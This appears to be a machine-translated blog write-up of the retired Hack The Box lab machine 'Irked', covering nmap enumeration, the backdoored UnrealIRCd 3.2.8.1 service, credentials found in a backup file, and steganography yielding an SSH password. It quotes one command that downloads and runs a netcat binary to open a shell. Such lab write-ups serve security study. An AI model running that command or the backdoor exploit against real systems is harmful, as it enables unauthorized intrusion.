{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-irked-en","result":{"data":{"markdownRemark":{"id":"f00bdbab-6af7-5fa6-a599-bb9b01e3de64","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-irked\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/e91760e3318a63484f72ba7e95b9bd5d/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABXElEQVQY0zWPTU8aURSG51+4d1M3GmXEAnPvOJ/ITPgIgjMiASHgR0zVVnQhKGp156pdGFemyyZuXfQn9Ffdx4tNF29OcpL3Oc8xbscjLi9O1M34lGQ7Jd5MKTdSakmbxk6Xnd6QuJ4g/BJuqcLn9QA3qmL5ETKMEUFEVnqYlqN0MF5/Xau334/8/fPC3XTE4Ogro8sJB8ffOD67YHJ3T3d4gFvZpNnp64MJjVaH4f4e290+ncE+OSecAVkVvjKm36v8+DlWz0/3PEzPqSY92v1DbVPDDivU0x7Si1mttckEdVacMjLwGO0KhLNOGNgs513MglTLOROjls6rwZeIq8kug34Tv2lRbrkUm4KoVSBuCYK6wCraFLfyyNjWZY816WojV7+rzSyflYJJkMwpYzHzSS8WlO2skRWSQij+JZBYGxKxMYNJcp6NLOnpzoDayPof5wOcyUu1lDV5B2khwKYFU/coAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/e91760e3318a63484f72ba7e95b9bd5d/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/e91760e3318a63484f72ba7e95b9bd5d/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/e91760e3318a63484f72ba7e95b9bd5d/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This time I am writing up the retired HackTheBox machine “Irked”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#internal-enumeration\">Internal Enumeration</a></li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>I ran the usual scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.117 $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\nPORT    STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp  <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">6</span>.7p1 Debian <span class=\"token number\">5</span>+deb8u4 <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">1024</span> 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad <span class=\"token punctuation\">(</span>DSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> <span class=\"token number\">75</span>:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp  <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.10 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Debian<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.10 <span class=\"token punctuation\">(</span>Debian<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">)</span>.\n<span class=\"token number\">111</span>/tcp <span class=\"token function\">open</span>  rpcbind <span class=\"token number\">2</span>-4 <span class=\"token punctuation\">(</span>RPC <span class=\"token comment\">#100000)</span>\n<span class=\"token operator\">|</span> rpcinfo: \n<span class=\"token operator\">|</span>   program version    port/proto  <span class=\"token function\">service</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">2,3</span>,4        <span class=\"token number\">111</span>/tcp   rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">2,3</span>,4        <span class=\"token number\">111</span>/udp   rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">3,4</span>          <span class=\"token number\">111</span>/tcp6  rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">3,4</span>          <span class=\"token number\">111</span>/udp6  rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">32926</span>/tcp6  status\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">34772</span>/udp6  status\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">36611</span>/tcp   status\n<span class=\"token operator\">|</span>_  <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">55055</span>/udp   status\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>Port 111 being open is somewhat unusual.</p>\n<p>Port 111 is used by the rpcbind service.</p>\n<p>Since nmap also ran rpcinfo, I could see which RPC program numbers were open.</p>\n<p>Running the rpcinfo command directly gave slightly more detail than nmap alone.</p>\n<p>NFS did not appear to be running.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ rpcinfo -p <span class=\"token variable\">$RHOST</span>\n   program vers proto   port  <span class=\"token function\">service</span>\n    <span class=\"token number\">100000</span>    <span class=\"token number\">4</span>   tcp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100000</span>    <span class=\"token number\">3</span>   tcp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100000</span>    <span class=\"token number\">2</span>   tcp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100000</span>    <span class=\"token number\">4</span>   udp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100000</span>    <span class=\"token number\">3</span>   udp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100000</span>    <span class=\"token number\">2</span>   udp    <span class=\"token number\">111</span>  portmapper\n    <span class=\"token number\">100024</span>    <span class=\"token number\">1</span>   udp  <span class=\"token number\">46043</span>  status\n    <span class=\"token number\">100024</span>    <span class=\"token number\">1</span>   tcp  <span class=\"token number\">39977</span>  status</code></pre></div>\n<p>I got a bit stuck here, but connecting to port 80 displayed the message <code class=\"language-text\">IRC is almost working!</code>.</p>\n<p>A quick search revealed that IRC typically runs on ports around 7000.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 740px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7981978f7d4ab5a59b7dbf3014cfbc58/50383/image-20220805223447532.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 99.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEMUlEQVQ4y3VUDUyUZRx/jgOUhRgqkYmItk7MgchiORcbWzVaq8gV2SxZDZg6vXLVaopTFNyOdorWRvMAUwzuOBQpQhGBaWB0HxwcH8eHGRiJdh5DWJTHffz6P897BzLHc/ff8/H+/r/n9/94XxazRgFFbDziNiRhQ+ImrI9PQtQqBVbGrEX0agWWRa7AkojlNEch4umVeGp5NCKfWTWvsbXPJyB2fSLiEl7ESymp2Jz8CpJTXhX2+pvpSH0jHS+nbsELm1KQmLRZYNco4vHcuo2SxW6cXZMxc7sFZrMFBqMJg4MDsNkGoauqx1c5BcjMysK297dg63tp2J7xEY6qvsMvrSYMEM5oMsPc3vGYMTwyum3DOLD/M+TujcPFk4vRVhaELr0cPXqGlrIlOKN6FruzX0ND06+YbzCXyyUWxaUV2PNhJCzldEcnmY2sZyHdQnN3CK0XizN7I0N2+iKcq6gRfk7nNNxu94wJhWfKziMnm5x7aNsbAJdJjv8MT9DM8NAYin+NS8V62sjJAwALw84PVqO3/09B6vF4ZhXevDWKjHcV8LYTuIPIyMllXgCPmcFpDsND01J4ae0y8YuCJNK+AHRUMBzO3ScRkjKv1wvQn6kLNSg+SKCbMjgNTBC7uTITJ3tSIjPL6bKFIhX8IrdJBlgZ8j9fh9sj47MqOaFSuQPGMh6qTBBxB3SFwtMRLjkTmdcSgnuNcnTqKfw2OZ0Rpp+hSh2Myw03BKHbp5J9nJGGkUs8NzJMtMhwtSQC2uMxgoDnymsJxt3GQFQeWwbHtSARAc8nehkMZxnOlZX6CF1+wrcwWk8Aq6SQkwzUBGOkfoE4QxeFb5CTBVLIgaRaJinskYl2KtGo5xJ+qsyGVSsBOFCEbA0SLfJPC8NtUj/VytNABWmPEJf6Ca06htLiE3MJVQWFqFYTYEDmqzCRdVLomkWoLs9F+dnj0J7eh+qiBExcl3p02kjK+xiaTzFodfrZHNKPNV/vwOE94QLgNASI6hm0EajQXcDQ8N/o77+F34fu40pTJ4q/UeLO1VCRFo4vOhCONlP/TJWFQg+Velf2O1JhbAGwNzGcLMxH6299qP25DlX6H1BT9S0u6lQ4X1kE9ZE0geHp+OKTtzEtXjTvbB/y7aUrrdibEQYMM9RroqA5thW1mnh0/xiN4ToZhmqlXPLi3W2QKpy7KwS1dddmwvXRkkKPtMk7qkZOlhyjDZJSDIYJR/RSdW30Hg9Sbv8IpgZnyNstg+rrE3P6z29MkuoVD0+VVECZmYzS/BW4cZrhzmUGRzPDX6TOQM1ffCgEmdsSUPJ95fxfGyHVx86HY2wK+gv1KFAdwaGcncj5cjsO7t9B+zz6wvyEe/bJmTZxjI1hjMzhuA+73Y6pqSm/QonUn4tHh8f7uAqO41WdnJzEg4kHNE9gfHxcEP4PvGSPQ8fdLhAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7981978f7d4ab5a59b7dbf3014cfbc58/8ac56/image-20220805223447532.webp 240w,\n/static/7981978f7d4ab5a59b7dbf3014cfbc58/d3be9/image-20220805223447532.webp 480w,\n/static/7981978f7d4ab5a59b7dbf3014cfbc58/ca4a8/image-20220805223447532.webp 740w\"\n              sizes=\"(max-width: 740px) 100vw, 740px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7981978f7d4ab5a59b7dbf3014cfbc58/8ff5a/image-20220805223447532.png 240w,\n/static/7981978f7d4ab5a59b7dbf3014cfbc58/e85cb/image-20220805223447532.png 480w,\n/static/7981978f7d4ab5a59b7dbf3014cfbc58/50383/image-20220805223447532.png 740w\"\n            sizes=\"(max-width: 740px) 100vw, 740px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7981978f7d4ab5a59b7dbf3014cfbc58/50383/image-20220805223447532.png\"\n            alt=\"image-20220805223447532\"\n            title=\"image-20220805223447532\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I scanned all ports.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt\nPORT      STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp    <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">6</span>.7p1 Debian <span class=\"token number\">5</span>+deb8u4 <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">1024</span> 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad <span class=\"token punctuation\">(</span>DSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> <span class=\"token number\">75</span>:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp    <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.10 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Debian<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">)</span>.\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.10 <span class=\"token punctuation\">(</span>Debian<span class=\"token punctuation\">)</span>\n<span class=\"token number\">111</span>/tcp   <span class=\"token function\">open</span>  rpcbind <span class=\"token number\">2</span>-4 <span class=\"token punctuation\">(</span>RPC <span class=\"token comment\">#100000)</span>\n<span class=\"token operator\">|</span> rpcinfo: \n<span class=\"token operator\">|</span>   program version    port/proto  <span class=\"token function\">service</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">2,3</span>,4        <span class=\"token number\">111</span>/tcp   rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">2,3</span>,4        <span class=\"token number\">111</span>/udp   rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">3,4</span>          <span class=\"token number\">111</span>/tcp6  rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100000</span>  <span class=\"token number\">3,4</span>          <span class=\"token number\">111</span>/udp6  rpcbind\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">39977</span>/tcp   status\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">46043</span>/udp   status\n<span class=\"token operator\">|</span>   <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">47929</span>/tcp6  status\n<span class=\"token operator\">|</span>_  <span class=\"token number\">100024</span>  <span class=\"token number\">1</span>          <span class=\"token number\">51699</span>/udp6  status\n<span class=\"token number\">6697</span>/tcp  <span class=\"token function\">open</span>  irc     UnrealIRCd\n<span class=\"token number\">8067</span>/tcp  <span class=\"token function\">open</span>  irc     UnrealIRCd\n<span class=\"token number\">39977</span>/tcp <span class=\"token function\">open</span>  status  <span class=\"token number\">1</span> <span class=\"token punctuation\">(</span>RPC <span class=\"token comment\">#100024)</span>\n<span class=\"token number\">65534</span>/tcp <span class=\"token function\">open</span>  irc     UnrealIRCd</code></pre></div>\n<p>IRC ports were open on 6697, 8067, and 65534.</p>\n<p>I tried enumerating them first.</p>\n<p>Reference: <a href=\"https://nmap.org/nsedoc/scripts/irc-unrealircd-backdoor.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">irc-unrealircd-backdoor NSE script — Nmap Scripting Engine documentation</a></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -d -p6697 --script<span class=\"token operator\">=</span>irc-unrealircd-backdoor.nse --script-args<span class=\"token operator\">=</span>irc-unrealircd-backdoor.command<span class=\"token operator\">=</span><span class=\"token string\">'wget http://www.javaop.com/~ron/tmp/nc &amp;&amp; chmod +x ./nc &amp;&amp; ./nc -l -p 4444 -e /bin/sh'</span> <span class=\"token variable\">$RHOST</span>\nPORT     STATE SERVICE REASON\n<span class=\"token number\">6697</span>/tcp <span class=\"token function\">open</span>  ircs-u  syn-ack\n<span class=\"token operator\">|</span>_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277\nFinal <span class=\"token builtin class-name\">times</span> <span class=\"token keyword\">for</span> host: srtt: <span class=\"token number\">238054</span> rttvar: <span class=\"token number\">178574</span>  to: <span class=\"token number\">952350</span></code></pre></div>\n<p>Interestingly, <code class=\"language-text\">UnrealIRCd 3.2.8.1</code> is the version that was officially distributed with a backdoor intentionally embedded in it.</p>\n<p>Reference: <a href=\"https://seclists.org/fulldisclosure/2010/Jun/277\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Full Disclosure: Fw: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp and site</a></p>\n<p>Running the following exploit gave me a reverse shell.</p>\n<p>Reference: <a href=\"https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">UnrealIRCd-3.2.8.1-Backdoor/exploit.py at master · Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor · GitHub</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0d703feaafba5051fe2ad0a0c87b84db/5a190/image-20220805231425537.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 30.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA7klEQVQY03WQWVLEMAxEfRpiZ98mk4nXhMlQFNz/Oo0kA/MDH11PkmWVWmq2G+L5jv3tE/vjA3Y/MS4zQnBIe0SMnhiQUpDYeyv1+TKhKivUdY26yqyIar2tmKcB09gLR2LXtTDGoCgKYgmttcSZpJdC3rU2Uvsh1xRvslwv2OwN27bC0sbMvEnA+XiVbTm31OOInDOHoRf1pGke0TQ1VCQrITpYR81uo9jLwOu6SFPXdyjLUixlPu3lOOc8jN9lIN9GbvEtbs6Wso3/xDfkIUY/a+p+HjiOKBZS8mKdbfAwbv5L/JHZNI2obdtffgExkL28GkxlLQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0d703feaafba5051fe2ad0a0c87b84db/8ac56/image-20220805231425537.webp 240w,\n/static/0d703feaafba5051fe2ad0a0c87b84db/d3be9/image-20220805231425537.webp 480w,\n/static/0d703feaafba5051fe2ad0a0c87b84db/d00b9/image-20220805231425537.webp 800w\"\n              sizes=\"(max-width: 800px) 100vw, 800px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0d703feaafba5051fe2ad0a0c87b84db/8ff5a/image-20220805231425537.png 240w,\n/static/0d703feaafba5051fe2ad0a0c87b84db/e85cb/image-20220805231425537.png 480w,\n/static/0d703feaafba5051fe2ad0a0c87b84db/5a190/image-20220805231425537.png 800w\"\n            sizes=\"(max-width: 800px) 100vw, 800px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0d703feaafba5051fe2ad0a0c87b84db/5a190/image-20220805231425537.png\"\n            alt=\"image-20220805231425537\"\n            title=\"image-20220805231425537\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"internal-enumeration\" style=\"position:relative;\"><a href=\"#internal-enumeration\" aria-label=\"internal enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Internal Enumeration</h2>\n<p>Looking for flags, I found that the user flag was located under the home directory of user <code class=\"language-text\">djmardov</code>.</p>\n<p>The current user <code class=\"language-text\">ircd</code> could not read that file, so I needed to escalate privileges.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">find</span> / -name user.txt <span class=\"token operator\"><span class=\"token file-descriptor important\">2</span>></span>/dev/null\n/home/djmardov/Documents/user.txt</code></pre></div>\n<p>Running <code class=\"language-text\">history</code> for initial recon showed that <code class=\"language-text\">.backup</code> inside <code class=\"language-text\">/home/djmardov/Documents</code> had been accessed before.</p>\n<p>Printing its contents revealed what appeared to be credential information.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 515px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/14d92ed889323e99f49f0e356d8dbcbc/fbdcb/image-20220806000018740.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.499999999999996%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA90lEQVQY0zVQ2Y6DQAzjbyhihmNgKNfAcJRSWlWr/f9/8ZqseLCcOJLjJBgnj3mdMM0jOteiJ9zYs+7gpwHeD2jbGiN59E76kfOmqUW3toQbeuqOfYOgqCwNHJZ1FkOdamQmhyLn5CxLYchpmkJrjSTRwkor4TiOyf/1iWBaPPzs8dgWSdYz2Uzzx3ORJZK8a2iUIAxD3G4Roigi3wRKKTG9EByfF35+vzg+O1aansbLtuL1fuIg3tSb+i7nnMZd16KuK6x8075vskQrJo6VICj4A1MY5KVBlmfIWRtbyNm2KlFyXlCzfE114m5RlgXceQnTXykv/AGoG6Rk32NZLwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/14d92ed889323e99f49f0e356d8dbcbc/8ac56/image-20220806000018740.webp 240w,\n/static/14d92ed889323e99f49f0e356d8dbcbc/d3be9/image-20220806000018740.webp 480w,\n/static/14d92ed889323e99f49f0e356d8dbcbc/92849/image-20220806000018740.webp 515w\"\n              sizes=\"(max-width: 515px) 100vw, 515px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/14d92ed889323e99f49f0e356d8dbcbc/8ff5a/image-20220806000018740.png 240w,\n/static/14d92ed889323e99f49f0e356d8dbcbc/e85cb/image-20220806000018740.png 480w,\n/static/14d92ed889323e99f49f0e356d8dbcbc/fbdcb/image-20220806000018740.png 515w\"\n            sizes=\"(max-width: 515px) 100vw, 515px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/14d92ed889323e99f49f0e356d8dbcbc/fbdcb/image-20220806000018740.png\"\n            alt=\"image-20220806000018740\"\n            title=\"image-20220806000018740\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I was not sure how to use it for a while, but noticing the word “steg” led me to try steganography on the image displayed in the browser.</p>\n<p>Running steghide prompted for a passphrase. Using the credential found in <code class=\"language-text\">.backup</code> yielded the SSH password for user <code class=\"language-text\">djmardov</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 592px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/71dd7496c8d8b96d0ea7310b9b13b2c9/1b853/image-20220806083220617.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 40.833333333333336%; position: relative; bottom: 0; 